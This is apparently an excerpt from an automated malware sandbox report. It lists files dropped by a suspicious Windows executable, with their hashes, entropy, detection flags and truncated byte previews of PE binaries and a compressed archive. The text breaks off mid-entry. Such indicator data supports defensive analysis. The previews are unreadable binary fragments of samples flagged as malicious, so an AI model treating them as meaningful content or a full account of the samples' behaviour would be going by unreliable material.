                                                                                      File Type:Generic INItialization configuration [cid_conf]
                                                                                      Category:dropped
                                                                                      Size (bytes):8727
                                                                                      Entropy (8bit):5.094074227428387
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sMbhbl/RTYIFIllUhX4HrPriTz8rFY1j84I2:sMbhbl/yIFky
                                                                                      MD5:1F4279A71CCBA6641722D5CC02FD0271
                                                                                      SHA1:09EC21382D8E5231487666EA0F68C7E5A503527D
                                                                                      SHA-256:A40CB3B8B45A734EC7100A16A4C789757EC6308626CA49FF6EDC79CD2B13D981
                                                                                      SHA-512:19EF3D153D7368F795E3722C60F43F4E78626FF66D50CA9AAE367FDD645B30525AE5AF64813FEF47A640D2F2098F7A2E52716CBB071A7938FA366148A504588E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:[ver_conf]..ver=3002264....[cid_conf]..acccid=9510015,9510026,9510017,9510018,9510025,9510016,6000271,6000399,3112550,3112553,3112554,9510043,9510050,9510055,9510060,9510065,9510068,9510071,9510075,9510076,9510083,9510084,3112700,3112701,3112702,3112716,3112717,3112739,3112770,9510089,9510090,3112814,3112815,3112817,5000746,9510095,3112710,9510096,3762,9510102,9510103,9510115,9510120..dencid=7000001..cld_cid=9510015,9510026,9510017,9510018,9510025,9510016,6000271,6000399,3112550,3112553,3112554,9510043,9510050,9510055,9510060,9510065,9510068,9510075,9510076,9510083,9510084,3112700,3112701,3112702,3112716,3112717,3112739,3112770,9510089,9510090,3112814,3112815,3112817,5000746,9510095,3112710,9510096,3762,9510102,9510103,9510115,9510120..ecld_cid=all..rgn_cid=3112550,3112553,3112554,3112700,3112701,3112702,3112716,3112717,3112739,6000271,6000399,9510015,9510016,9510017,9510018,9510025,9510026,9510043,9510050,9510055,9510060,9510065,9510068,9510071,9510075,9510076,9510083,9510084,3112770,
                                                                                      Process:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 454788 bytes, 1 file, at 0x2c +A "KitTip.dll", number 1, 28 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):454788
                                                                                      Entropy (8bit):7.998324931296441
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:JuY+vWGZ8JCYcZEhGIUmHtcLM1WiHL/VRC9:ZC8+PIUmqLCWE7E
                                                                                      MD5:DCA9DC123629E6EB09405FBC44D8F213
                                                                                      SHA1:A0DD1B8121612D719B9E5C828A1DEE7C8E7D08D7
                                                                                      SHA-256:921458ACF612524BF2F0F595B1046B5B40EA481F6B4BDB77F6DE371A87F84242
                                                                                      SHA-512:0B39C98D730231AE90099CE49865F92BE03E93E946DAF980931E9F63836B6C08B07D227E71A9DA707F5461AFBE1FFE08C851DD8E7938A842192195F3E1DB531D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:MSCF............,...................G..................W.V .KitTip.dll..6..F..CK.}|...?|..Z.6%.R,P.h.b...ZL..m.i.J.&0....j....jA0.k8ds.n:....sn+..P.%..E.A..?....V-..(...}.6-Uw..........9...9.:)....QQ...hTQ.+.P..?.AQ...._.......GUT."k..;~....e....o...?.d-..u..YEs.Y.....ii)v....^.....c..b.t}.....W..@..^.nz~.]..E.C.s...v....9.....o.z........Z~........+J.!I...,...@I..jHV.7...(..3#QQ.HL.U.'(J.^&.........O..Q.*...d.OU..u.T..r)yf%....~>M.r..@...DQ.>MV2..?.#E.@./Sz..4%};...oY.k..d.......(7.].....*J.=..w.{(.G>j.p...l..M..2...S{.k.._.B.......W}.[.b......n....p.....e.......+e-].I.o.......cEvS]...`g....6.Z....'[..6cx...L.S..H.....X...[.{..K?J............sO.t>...%q.U............M.C;..F.m.@R~...H..<k...Z.....O..t.?./.n.x..z..=L TgvW.&?Ho|...."{....}G..!`....V......s.P.R.....By..X.(.)pX...v[.od...KL.D."....E.y../..a.. @.........)..;......s5'..M....L.+z$.NNdg. Eq.X4.......=Y..W...............(:.P.Y.EO...)......g..z..:...1|u..O.F....S4~>)Q...,...bB..]3
                                                                                      Process:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      File Type:Generic INItialization configuration [cid_conf]
                                                                                      Category:dropped
                                                                                      Size (bytes):8727
                                                                                      Entropy (8bit):5.094074227428387
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sMbhbl/RTYIFIllUhX4HrPriTz8rFY1j84I2:sMbhbl/yIFky
                                                                                      MD5:1F4279A71CCBA6641722D5CC02FD0271
                                                                                      SHA1:09EC21382D8E5231487666EA0F68C7E5A503527D
                                                                                      SHA-256:A40CB3B8B45A734EC7100A16A4C789757EC6308626CA49FF6EDC79CD2B13D981
                                                                                      SHA-512:19EF3D153D7368F795E3722C60F43F4E78626FF66D50CA9AAE367FDD645B30525AE5AF64813FEF47A640D2F2098F7A2E52716CBB071A7938FA366148A504588E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:[ver_conf]..ver=3002264....[cid_conf]..acccid=9510015,9510026,9510017,9510018,9510025,9510016,6000271,6000399,3112550,3112553,3112554,9510043,9510050,9510055,9510060,9510065,9510068,9510071,9510075,9510076,9510083,9510084,3112700,3112701,3112702,3112716,3112717,3112739,3112770,9510089,9510090,3112814,3112815,3112817,5000746,9510095,3112710,9510096,3762,9510102,9510103,9510115,9510120..dencid=7000001..cld_cid=9510015,9510026,9510017,9510018,9510025,9510016,6000271,6000399,3112550,3112553,3112554,9510043,9510050,9510055,9510060,9510065,9510068,9510075,9510076,9510083,9510084,3112700,3112701,3112702,3112716,3112717,3112739,3112770,9510089,9510090,3112814,3112815,3112817,5000746,9510095,3112710,9510096,3762,9510102,9510103,9510115,9510120..ecld_cid=all..rgn_cid=3112550,3112553,3112554,3112700,3112701,3112702,3112716,3112717,3112739,6000271,6000399,9510015,9510016,9510017,9510018,9510025,9510026,9510043,9510050,9510055,9510060,9510065,9510068,9510071,9510075,9510076,9510083,9510084,3112770,
                                                                                      Process:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):820128
                                                                                      Entropy (8bit):6.6345425271369445
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:5AegyJp06vLzKmXJqLeUN36M6kCk3AyyCIN87IJuK0H2M7F9BGsf36wl9K:5AYJpTLemsSI6M6kr3AgIG7KGH/6wl9K
                                                                                      MD5:5ED59AC24C1047A8B533C6C06ECBC40F
                                                                                      SHA1:59819A80324E0F0F10EF43B5A43D5B102EC81F0D
                                                                                      SHA-256:DCEF7E57AC84F852E37C7411F0726172B02E3286E1A4AB4246506E3A488EA310
                                                                                      SHA-512:C16559A140EFDF0FEADB49BA720B83D644240314E6329FB93352B3192CA3340BD00DA78308C18ED476273333B4B2BBCABEFE43578FB23159BF6CC0223D809808
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I/..'|..'|..'|...|..'|...|..'|...|..'|...|..'|..J|..'|..&|0.'|..\|..'|...|..'|...|..'|...|..'|...|..'|Rich..'|........PE..L....3.b...........!................c.....................................................@.............................\.......|....... ............:...I...`...X..................................p...@............................................text...:........................... ..`.rdata..LT.......V..................@..@.data...\........D..................@....tls................. ..............@....rsrc... ............"..............@..@.reloc..~v...`...x..................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):910056
                                                                                      Entropy (8bit):6.656782267728841
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:cgkND0jkR88wR7KXOlkbZSYjJ3Rupdw8on/2M7joxLBGsf3ulIkb:rkNDuFRRaOlk1SY9BD8oBo//uKU
                                                                                      MD5:76732172E58419B7703C6885ED0F02D8
                                                                                      SHA1:AAE9AAF0DA9FA26FC2639D189D597DE5148625FF
                                                                                      SHA-256:10D5405DB1B71758B342FF2B52F33C6541112BEC911FF489662AEBAF78DAC963
                                                                                      SHA-512:F685551C79C7A0D57F2648036056311454DC4A487F7849E251C701C253F2A444AE2E50EDF899467F27DC8B6A6CD9B8838315D27F1F08C6AF7E85E531E14C24F1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.`.=.3.=.3.=.3!rE3.=.3.EF3.=.3.EP3.<.3.EW3.=.3...3.=.3.=.3.<.3...3.=.3.EY3.=.3.EA3.=.3.oG3.=.3.EB3.=.3Rich.=.3........................PE..L...u..d...........!.........................................................P...........@......................... [..\...l9..|....0.. ...............P,......(f......................................@............................................text............................... ..`.rdata..|{.......|..................@..@.data...|....`...H...N..............@....tls......... ......................@....rsrc... ....0......................@..@.reloc...}.......~...6..............@..B........................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):910056
                                                                                      Entropy (8bit):6.656782267728841
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:cgkND0jkR88wR7KXOlkbZSYjJ3Rupdw8on/2M7joxLBGsf3ulIkb:rkNDuFRRaOlk1SY9BD8oBo//uKU
                                                                                      MD5:76732172E58419B7703C6885ED0F02D8
                                                                                      SHA1:AAE9AAF0DA9FA26FC2639D189D597DE5148625FF
                                                                                      SHA-256:10D5405DB1B71758B342FF2B52F33C6541112BEC911FF489662AEBAF78DAC963
                                                                                      SHA-512:F685551C79C7A0D57F2648036056311454DC4A487F7849E251C701C253F2A444AE2E50EDF899467F27DC8B6A6CD9B8838315D27F1F08C6AF7E85E531E14C24F1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.`.=.3.=.3.=.3!rE3.=.3.EF3.=.3.EP3.<.3.EW3.=.3...3.=.3.=.3.<.3...3.=.3.EY3.=.3.EA3.=.3.oG3.=.3.EB3.=.3Rich.=.3........................PE..L...u..d...........!.........................................................P...........@......................... [..\...l9..|....0.. ...............P,......(f......................................@............................................text............................... ..`.rdata..|{.......|..................@..@.data...|....`...H...N..............@....tls......... ......................@....rsrc... ....0......................@..@.reloc...}.......~...6..............@..B........................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 64x64, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):3018
                                                                                      Entropy (8bit):7.781887629056718
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:u/fuERAY4TvSCzFVff7UhbOMry1MPR76la7Ze5rX6qYnhx6/izYZ6cVhp9ljQL:uOET4TtVfT6BNR+GeRqqSiudcJIL
                                                                                      MD5:A7C80884BE72C823F1A7B23C59590B01
                                                                                      SHA1:E27D97ED991E8326EF81055D96EE5358CAA002E9
                                                                                      SHA-256:0E8C090F2FB151A568A3923E0FE2343C61AA0D8BAB1F87891325A3CC68BB736F
                                                                                      SHA-512:49C5768F028C0B49384B2E417596CDE668FB84EA2ADC8D7B2B9F9209FE371E28D69F4EFE621F74729D05999860BF332FC5CDF4EF05D8220F8CEBF470CD4521F5
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................@.@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....l./$.....fc.P9$.A@.].J~.....K.K.f.F.7..j.V....I..o..B..TV.8..g;T.H..'V...[...{...{{.$.E<l.+...R. ..5.....|S.......z.D...T.D..G6.%..u..p#8......+...g.2..V..|?.kU..u].4.o..w}...;m...G.[.8.+.rn,..Y.;*.......R...^N.Y....T........g.....P2..Sr.`H\.@...........N..u.!.V.omy..
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11728
                                                                                      Entropy (8bit):6.672282124280155
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:vn41usjf5bWWBhWSWYnO/VWQ4mWeZvmF4EHsqnajKse3pt:vn41usjf5bWWBhWIUbmF4UslGse3z
                                                                                      MD5:DEFC34FAA61630DB1218170F389788AB
                                                                                      SHA1:B6445CA0759B5D37D3341B4F760378BB17A09783
                                                                                      SHA-256:044CC370D38456DE51D85AED25681AE40240DCB5CB2F809B681EF6FD1866B90B
                                                                                      SHA-512:96C5B679FB39110094C759C6984D977F586592C918DF1BB2915936C19BC2912EA3048D0EF8F41F4C380FAFE7BC18A4F936538FFB2178E97756E9EA12F0391DDE
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L...@.T`...........!......................... ...............................@......~.....@.........................`................0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):143752
                                                                                      Entropy (8bit):6.295949216105403
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:9hGkiPmRanRXVd4goM1F0OitohxMaU77lkYnqND:2kJW9V+9u57U7p9q1
                                                                                      MD5:363C4D06B11C38F884A0FDDE276A5186
                                                                                      SHA1:BF5102C7040F5205B81B4A6645208E7662DA4857
                                                                                      SHA-256:3F1326C86FC079F3E4AD1B4269E55B51EA2561F365D70793751299E7CF3E6E25
                                                                                      SHA-512:30F3EC0743B89927C3CF9D2ACA72AC2A946542582BA9CE8B267A858938C142B4F4A804A4D8370E39548C017DA96F6F7FC73A6212BB59D20907D194CD18ACAA4A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...............q.......q.......q.......q.......aj.........B...}p......}p......}p........n.....}p......Rich............................PE..L......b...........!.........f..............................................0......K2....@.........................@...p.......|......................../... ..d.......T...............................@............................................text............................... ..`.rdata...I.......J..................@..@.data...,...........................@....rsrc...............................@..@.reloc..d.... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):243592
                                                                                      Entropy (8bit):6.319126761806242
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:YzfyuC+Z3+jIU6G3RBf8ZQ8ys10gd4qo4lCfmZz0s3rMum6QTjmV+HXLlWSS/Hux:Gfyul7U6ZQ8UhICfmVt3rMuLQnm8Lwl4
                                                                                      MD5:D652444B1809314C668018E57112FBCA
                                                                                      SHA1:BE9593A3F61BF77EEEAEB48D09C48AC32FBBECAB
                                                                                      SHA-256:9426027D8DEAD037F84478D669F3FA3BAAF9917FECFF2330A3CBD96B1316C221
                                                                                      SHA-512:3A0ADB731E3FE4499AC09CE3838F59740B34E4E065AF43FEBA151CD80B22934A121B75AC568C2A825D953D5AE64FEF3ABE3F6F0717EE118BF568714D92A77982
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........MGI.#.I.#.I.#...'.E.#... .J.#...".M.#...&.W.#.@..g.#...".J.#.I."...#...&.M.#...'.K.#...&.D.#.....H.#.I...H.#...!.H.#.RichI.#.........................PE..L......b..........................................@.......................................@..................................d.........................../..........p9..T............................9..@...............d............................text............................... ..`.rdata...i.......j..................@..@.data................h..............@....rsrc................l..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):800136
                                                                                      Entropy (8bit):6.772930852505649
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:qLUlalsrUnV9acTxCHiaVcNIYZP/QI1dOVqJ4M8F:qLUoyrUnV9acTxJaYZP/QI1dOQJ4pF
                                                                                      MD5:5423E2BDD74D9288A76CE7D0E3843219
                                                                                      SHA1:6887444E0C29233832118A8EF3405FA1AE64FABF
                                                                                      SHA-256:3153144989BE26BBB68A0B67C2BDDB9472363D98C523B8CD44F547CFA1688BCC
                                                                                      SHA-512:C727DDEB579C0F8C3C5888A59C39ED949BF1192A783AF83ECF99C9B11323C8D6F212578F57016E9E344CE2E73CECA94A042234788CEB8A1FC8BF697853386608
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................4....................3......#............].......].......].......Rich............PE..L...(:.b...........!.........*......}........................................@............@.........................P....\..\g.........................../......4...@~..T...................8........~..@...............(............................text............................... ..`.rdata..............................@..@.data................r..............@....reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):205856
                                                                                      Entropy (8bit):6.764234372764992
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OLkLbDiPiB5C/stnXnWsGiQ8Sw2IKEFdLj:OLuib/sBGfudKeLj
                                                                                      MD5:91134EBE2EFC433DA3AA4DA1D78A1048
                                                                                      SHA1:21A1F2440DE5F44EE749277B96BAF46BC40CBE50
                                                                                      SHA-256:55AA1CAB9779756BB5B4E0C723B52D7B085D4751455C3435D294A014DB563B1E
                                                                                      SHA-512:19A66328F0B7A047EA409998E52EBE14FEB19D4DFFB0A797F83C4B35DA1E329066E95EEA007315B06100C82BB28B26BE0CD48205A49DE3E3B57259DD754584F6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........F.a.F.a.F.a...e.J.a...b.N.a...d.N.a...`.B.a...d.Y.a...`.B.a.O...d.a.".`.E.a.F.`.H.a...h.R.a....G.a.F...G.a...c.G.a.RichF.a.................PE..L...MK.d.................z...v.......b............@.......................... ......`4....@.................................X...|.... ..`............... 4..............p...............................@............................................text....y.......z.................. ..`.rdata...y.......z...~..............@..@.data...............................@....rsrc...`.... ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):318496
                                                                                      Entropy (8bit):6.786827654595375
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:B3/XavQMH9Q8O0WnV4H/LrQfdlfeb0zIwXmn6iWiTCSCWXa7km06CIC52mO8iTCw:uQKVO0+GRsD7Yvs9rTqsuGh9
                                                                                      MD5:D17DDD41E804496F5077958A93D8843B
                                                                                      SHA1:9D75CDA2FD3528E3F74698E9C767E9372EC2CC57
                                                                                      SHA-256:90465F4F59FC9FB29D12D44765712CE97C3F9CB9067EE33C2D6F2ABF88C87190
                                                                                      SHA-512:09F3F415E9DE22765DDCC895A7E67561706BAACB0E4497FCC2CE21D1E0D90732F486312219A162BB31D4EE6CC2800492BBDC8B2B2370C3ED76463F1F5FD2E261
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mF...............................................................................Z..................................Rich....................PE..L....K.d............................Na............@.................................S.....@............................................................. 4.......'...n..T....................o......(o..@...............0............................text............................... ..`.rdata..j...........................@..@.data...`...........................@....rsrc...............................@..@.reloc...'.......(..................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):272928
                                                                                      Entropy (8bit):6.716200412840166
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:hzOIHp6d4MIBqv9PGnXQHRKoYGzn2gXyhnJNZ69TixUpop2jMcikMDBLP+qKDdIj:hzOIJ6qMItwzeD5+qKDdNfmw/8
                                                                                      MD5:F03A769053C0D90F7B74A0AFA25987E1
                                                                                      SHA1:131BBDCF003293C2F240C0F3AEA5C3F4B94313F9
                                                                                      SHA-256:B86CBAEC962FC86468442685675AD5C9ADA95E653FA023956A9BC553670C7EE4
                                                                                      SHA-512:96E7C503214D081B4664AB3C0D2AA87BA3F6450EFD3C1722EC20557F3441D6F7F9B1E194E95BDC3EAB8FD332E94FAB90772702320D07F49E4FDED3118EC765C0
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[..~..-..-..-{..,..-M..,..-M..,..-...,..-...,..-M..,..-M..,..-.."-..-..2-6.-..-..-...,=.-..^-..-..6-..-...,..-Rich..-................PE..L.....~d.................^..........68.......p....@..........................0............@.................................0........p.. ............... 4......."......T...............................@............p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data........P.......@..............@....rsrc... ....p.......J..............@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1686344
                                                                                      Entropy (8bit):7.245991110620502
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:LNGxilgxG0kPzZQJUfU5vi53r67VwT/pd1U021AjHxFnx:LNGxilgxHKfA6Z+yTblLZ
                                                                                      MD5:8A8E78EC895C9171F74A4E9A92B7131D
                                                                                      SHA1:1721862676DC18818FD84B9A1C1E1458FCC8C6F5
                                                                                      SHA-256:6C00E8BC3B9734C6D647B09A3C345045A5A5E5B15D437BEC2F18D547988B6BA7
                                                                                      SHA-512:8EAEBA51C48EB5B77DDCF06DD6D9765630C08C2DC4FEFBAE78ECCC4D2C6C3F51D2925EFFE1666709493A767B7432D78B0A301F06411EF8EDCDB8D3C930AB0212
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........D}n.%.=.%.=.%.=.].=.%.=w..=.%.=.M.<.%.=.M.<.%.=.M.<.%.=.M.<.%.=.].=.%.=.L.<.%.=zL.<.%.=JL.<.%.=sL.<.%.=.%.=.&.=AL.<.%.=AL.=.%.=.%.=.%.=AL.<.%.=Rich.%.=................PE..L......c.............................1............@.................................%.....@.....................................0........K..............H5..............T...........................X...@............................................text............................... ..`.rdata..............................@..@.data...,...........................@....rsrc....K.......L..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):205344
                                                                                      Entropy (8bit):6.660457853696743
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:KvTW9w0B5J8BCsYYWKJfaOqTBtw2cBEq6IV:KbW9YfYYlJfaOqTTlcBn6k
                                                                                      MD5:163745C2E7DF57C29533FE4CC8F574BF
                                                                                      SHA1:188B98F75B7F255456503BB905B462B7509FDF36
                                                                                      SHA-256:BAAF900956729E77E9D1373227807E35B999652DB3052F6B656BE50217D794F5
                                                                                      SHA-512:B7D4ABC7176112AE055DFEFA5191543EC45B7640D63BCFDBE6DECE75CDF2D489BCECA29A077189B5923173D27618130E8896E4CD3D5F691E5904822FE24B1E85
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........)L..G...G...G...C...G...F...G...B...G...C...G...D...G.......G.......G...F...G...F...G...F...G...B...G.......G.......G...E...G.Rich..G.........................PE..L....K.d.....................n....................@.......................... ............@..................................?.......p.................. 4......t.......T...............................@............................................text...r........................... ..`.rdata..............................@..@.data........`.......B..............@....rsrc........p.......J..............@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.612978494471077
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:IlxoWBhWbWYnO/VWQ4mWdYgV5goqnajKs0Vc5:Il2WBhW7UY3V5nlGs0VW
                                                                                      MD5:13FE5561EB3DB2CED126B79B79790799
                                                                                      SHA1:384D673742AA451827F208DC05BECDF9958ACA85
                                                                                      SHA-256:6BE5B5755C8C864096279FF311E3B0A77865E0AA7C6FFC6E6CE2622C789E43B1
                                                                                      SHA-512:C388A50CE16C0798F43988FEB06B65B7D29B489CBA0A830CED1ACAEDB540B2D921F8D0416ACC6ADB7E3565EEED1D27062942ABC78873264A1A05E5DE495B294F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L....Z*............!......................... ...............................@......m.....@.........................`...+............0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):12240
                                                                                      Entropy (8bit):6.6629297212483465
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:PBuh8YWBhW3o2WYnO/VWQ4mW8OT2wNLrMhEqnajKsZ9WGjg:PBcWBhW3ocUCTVNjlGsZy
                                                                                      MD5:CE582E3A15CB6776599A8AAE328831AD
                                                                                      SHA1:71989C59B61A97C365AAD70DB69BBF6BDEE99552
                                                                                      SHA-256:986A6C94776691DCC162D0AD49788C85E39BA255406CDDB42826FD98F12B4ECB
                                                                                      SHA-512:6C27EF58B2DACB808FD818E69C058E6D1E3BF9C006D0887D3F0F2FE489852EACB49C25DA85444D84378FF4675AAE3859511C3460C1317CE6637E0C4B8AFC03C6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..L....+.............!......................... ...............................@...........@.........................`................0...................!..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11728
                                                                                      Entropy (8bit):6.621407370112907
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7+WBhWWnWYnO/VWQ4mW4hUj0j21EhqnajKs0qMl:7+WBhW0UmgqslGs0fl
                                                                                      MD5:75D6DB7F779C887EE80962C18A411500
                                                                                      SHA1:B76F21B4F8BC6D6F99F659CAF3A45E1C62E83B51
                                                                                      SHA-256:51EAAAB1E5955DEDB71E27E77F8BAE0F960969487D115C53F38955ED7F34935F
